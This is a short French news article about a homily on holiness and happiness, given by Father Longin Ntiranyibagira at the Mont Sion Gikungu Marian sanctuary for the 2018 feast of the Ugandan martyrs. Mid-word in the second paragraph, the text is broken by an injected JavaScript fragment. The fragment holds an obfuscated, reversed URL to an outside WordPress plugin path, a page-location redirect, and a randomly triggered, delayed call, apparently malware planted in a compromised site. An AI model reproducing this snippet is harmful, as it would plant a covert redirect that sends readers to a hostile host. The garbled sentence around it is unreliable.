« La sainteté a été destinée pour toute personne. Seuls comptent le rôle de chacun et ses actes pour atteindre cette sainteté. » Tels sont les mots qu’a prononcé Père Longin Ntiranyibagira, Vice-Recteur du Sanctuaire marial de schoenstatt Mont Sion Gikungu lors de la Messe de ce dimanche 17 juin 2018, à partir de 9h30 minutes. C’était la solennité des martyrs de l’Ouganda.
Dans son homélie, le Père Longin a beaucoup insisté sur la sainteté et le bonheur. A partir des exemples des Saint Polycarpe, Sainte Maria Goretti, Sainte Thérèse de l’Enfant Jésus, etc., le Père Longin a montré que la sainteté n’a pas de rapport avec l’âge qu’on peut passer sur terre mais du comportement qu’on atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopte, appuyé par le Seigneur. La sainteté, ajouta-t-il, n’est pas pour une catégorie des gens. Elle est pour tous.
La sainteté, a dit le Père Longin, a aussi la relation avec le bonheur. Et ce bonheur n’est pas d’ici-bas mais il s’agit du bonheur dans le Christ.
Il a conclu son homélie en disant que Jésus est le seul vrai bonheur et qu’il est lui-même le chemin qui mène au vrai bonheur, au bonheur éternel.
Rappelons pour clore que les martyrs de l’Ouganda sont morts entre 1885 et 1887. Ils ont été béatifiés le 6 juin 1920 par le Pape Benoît XV et canonisés le 18 octobre 1964 par le Pape Paul VI.
Jean de Dieu Niyonkuru